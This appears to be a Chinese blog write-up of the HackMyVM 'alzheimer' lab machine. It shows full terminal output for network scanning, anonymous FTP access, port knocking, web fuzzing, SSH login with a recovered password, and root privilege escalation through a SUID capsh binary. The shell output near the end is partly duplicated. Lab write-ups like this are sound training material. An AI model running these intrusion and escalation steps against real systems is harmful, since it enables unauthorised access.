alzheimer —hackmyvm
1.扫描网段
┌──(root㉿kali)-[/home/ace]
└─# nmap -sP 192.168.56.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:51 CST
Nmap scan report for 192.168.56.1
Host is up (0.00033s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00019s latency).
MAC Address: 08:00:27:F1:8F:2D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.128
Host is up (0.0021s latency).
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.127
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.01 seconds
2.扫描端口
┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:51 CST
Nmap scan report for 192.168.56.128
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.127
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds
3.由上述结果可知,ftp连接使用anonymous空密码登录
┌──(root㉿kali)-[/home/ace]
└─# ftp 192.168.56.128
Connected to 192.168.56.128.
220 (vsFTPd 3.0.3)
Name (192.168.56.128:ace): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||31145|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 113 4096 Oct 03 2020 .
drwxr-xr-x 2 0 113 4096 Oct 03 2020 ..
-rw-r--r-- 1 0 0 70 Oct 03 2020 .secretnote.txt
226 Directory send OK.
ftp> get .secretnote.txt
local: .secretnote.txt remote: .secretnote.txt
229 Entering Extended Passive Mode (|||22343|)
150 Opening BINARY mode data connection for .secretnote.txt (70 bytes).
100% |*****************************************************************************************************| 70 33.75 KiB/s 00:00 ETA
226 Transfer complete.
70 bytes received in 00:00 (18.70 KiB/s)
ftp>
4.查看文件
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-J1l0tpsU-1690107369393)(F:%5CDESKTOP%5C%E6%B8%97%E9%80%8F%5Cimage%5Cimage-20230723175853705.png)]
说明要使用knockd工具打开端口
┌──(root㉿kali)-[/home/ace]
└─# knock 192.168.56.128 1000:tcp 2000:tcp 3000:tcp -v
hitting tcp 192.168.56.128:1000
hitting tcp 192.168.56.128:2000
hitting tcp 192.168.56.128:3000
再度扫描端口:
┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 17:35 CST
Nmap scan report for 192.168.56.128
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.127
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b13b2b36e56bd72a6defbfda0a5d2d43 (RSA)
| 256 35f170aba366f1d6d72cf7d1247a5f2b (ECDSA)
|_ 256 be15fab681d67fabc81c97a5ea11854e (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds
80端口开放了 ,即网页可进行访问了
┌──(root㉿kali)-[/home/ace]
└─# curl -l 192.168.56.128
I dont remember where I stored my password :(
I only remember that was into a .txt file...
-medusa
<!---. --- - .... .. -. --. -->
5.wfuzz扫一下
┌──(root㉿kali)-[/home/ace]
└─# wfuzz -c --hc=404 -t200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://192.168.56.128/FUZZ.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.128/FUZZ.txt
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 5 L 27 W 132 Ch "# directory-list-2.3-medium.txt"
000000007: 200 5 L 27 W 132 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000003: 200 5 L 27 W 132 Ch "# Copyright 2007 James Fisher"
000000004: 200 5 L 27 W 132 Ch "#"
000000002: 200 5 L 27 W 132 Ch "#"
000000005: 200 5 L 27 W 132 Ch "# This work is licensed under the Creative Commons"
000000008: 200 5 L 27 W 132 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000006: 200 5 L 27 W 132 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000009: 200 5 L 27 W 132 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000010: 200 5 L 27 W 132 Ch "#"
000000011: 200 5 L 27 W 132 Ch "# Priority ordered case-sensitive list, where entries were found"
000000012: 200 5 L 27 W 132 Ch "# on at least 2 different hosts"
000000013: 200 5 L 27 W 132 Ch "#"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220547
Requests/sec.: 0
6.尝试登录ssh
密码:Ihavebeenalwayshere!!!
登陆成功:
┌──(root㉿kali)-[/home/ace]
└─# ssh medusa@192.168.56.128
The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established.
ED25519 key fingerprint is SHA256:O2S8HAtlJxSTJJgIQUiIzsbSKX/qj9Thyn38JM6wsBY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts.
medusa@192.168.56.128's password:
Linux alzheimer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 3 06:00:36 2020 from 192.168.1.58
medusa@alzheimer:~$
7.提权
medusa@alzheimer:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh
发现:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0si0WGSA-1690107369394)(F:%5CDESKTOP%5C%E6%B8%97%E9%80%8F%5Cimage%5Cimage-20230723180449391.png)]
medusa@alzheimer:~$ /usr/sbin/capsh --gid=0 --uid=0 --
root@alzheimer:~#
root@alzheimer:~# cd root
bash: cd: root: No such file or directory
root@alzheimer:~# cd ..
root@alzheimer:/home# cd .
root@alzheimer:/home# cd ..
root@alzheimer:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@alzheimer:/# cd root
root@alzheimer:/root# ls
root.txt
root@alzheimer:/root# cat root.txt
HMVlovememories
root@alzheimer:/root#
vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@alzheimer:/# cd root
root@alzheimer:/root# ls
root.txt
root@alzheimer:/root# cat root.txt
HMVlovememories
root@alzheimer:/root#
6207
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
